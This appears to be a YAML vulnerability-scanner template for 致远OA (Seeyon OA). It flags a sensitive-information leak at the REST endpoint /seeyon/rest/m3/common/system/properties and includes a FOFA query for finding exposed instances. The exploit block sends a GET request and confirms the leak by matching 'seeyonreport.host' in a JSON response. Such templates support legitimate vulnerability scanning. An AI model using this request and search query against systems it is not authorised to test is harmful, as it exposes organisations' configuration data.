product: 致远OA
vName: 致远OA rest-m3-common-system-properties接口存在敏感信息泄露
type: 信息泄露
vID: [ ]
level: 2
vDesc: 致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验；在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。致远OA rest/m3/common/system/properties接口存在敏感信息泄露漏洞
version: ''
note: ''
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://cn-sec.com/archives/3214985.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /seeyon/rest/m3/common/system/properties
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - seeyonreport.host
            logic: and
          header:
            value:
              - application/json
            logic: and